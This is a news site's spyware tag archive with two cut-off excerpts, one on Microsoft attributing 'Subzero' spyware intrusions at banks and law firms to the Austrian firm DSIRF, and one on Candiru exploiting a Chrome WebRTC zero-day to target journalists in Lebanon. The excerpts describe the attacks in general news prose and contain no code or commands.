Tag Archive for: Spyware

Microsoft says Austrian firm behind spyware targeting law firms, banks

LONDON, July 27 (Reuters) – Security researchers at Microsoft (MSFT.O) have said an Austrian firm was behind a string of digital intrusions at banks, law firms and strategic consultancies in at least three countries.

The firm, DSIRF, developed spyware – malicious software designed to spy on or steal information from a target’s device – called “Subzero” which uses so-called Zero-day exploits to access confidential information such as passwords, or logon credentials, Microsoft said in a blog post on Wednesday.

“Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama,” the post said, without identifying the victims.

Register now for FREE unlimited access to Reuters.com

Vienna-based DSIRF, or DSR Decision Supporting Information Research Forensic GmbH, did not respond to email and telephone requests for comment.

Zero-day exploits are serious software flaws of great value to both hackers and spies because they work even when software is up to date.

The term comes from the amount of warning users get to patch their machines protectively; a two-day flaw is less dangerous because it emerges two days after a patch is available.

Some cybersecurity firms develop such tools to deploy alongside routine “pentesting”, or penetration testing, to test a company’s digital defences against malicious attacks.

“Microsoft’s interaction with a victim confirmed they had not consented to red teaming and malware deployment, and confirmed it was unauthorised activity,” Microsoft Security Unit general manager Cristin Goodwin, who authored the report, told Reuters.

According to a copy of an internal presentation published last year by German news website Netzpolitik, DSIRF advertises Subzero as a “next generation cyber warfare” tool which can take full control of a target’s PC, steal passwords, and reveal its location.

Another one of the slides in that presentation showed several uses for the spyware, including anti-terrorism and the targeting of human trafficking and child pornography rings.

Microsoft’s findings come as the United States and Europe mull tighter rules around vendors of spyware, a fast-growing and under-regulated…


Candiru Spyware Caught Exploiting Google Chrome Zero-Day to Target Journalists

Candiru Spyware Chrome Exploit

The actively exploited but now-fixed Google Chrome zero-day flaw that came to light earlier this month was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.

Czech cybersecurity firm Avast linked the exploitation to Candiru (aka Saito Tech), which has a history of leveraging previously unknown flaws to deploy a Windows malware dubbed DevilsTongue, a modular implant with Pegasus-like capabilities.

Candiru, along with NSO Group, Computer Security Initiative Consultancy PTE. LTD., and Positive Technologies, were added to the entity list by the U.S. Commerce Department in November 2021 for engaging in “malicious cyber activities.”

“Specifically, a large portion of the attacks took place in Lebanon, where journalists were among the targeted parties,” security researcher Jan Vojtěšek, who reported the discovery of the flaw, said in a report. “We believe the attacks were highly targeted.”


The vulnerability in question is CVE-2022-2294, memory corruption in the WebRTC component of the Google Chrome browser that could lead to shellcode execution. It was addressed by Google on July 4, 2022. The same issue has since been patched by Apple and Microsoft in Safari and Edge browsers.

The findings shed light on multiple attack campaigns mounted by the Israeli hack-for-hire vendor, which is said to have returned with a revamped toolset in March 2022 to target users in Lebanon, Turkey, Yemen, and Palestine via watering hole attacks using zero-day exploits for Google Chrome.

Candiru Spyware

The infection sequence spotted in Lebanon commenced with the attackers compromising a website used by employees of a news agency to inject malicious JavaScript code from an actor-controlled domain that’s responsible for redirecting potential victims to an exploit server.

Via this watering hole technique, a profile of the victim’s browser, consisting of about 50 data points, is created, including details like language, timezone, screen information, device type, browser plugins, referrer, and device memory, among others.

Avast assessed the information gathered to ensure that the exploit was being delivered only to the intended targets. Should the collected data be deemed of…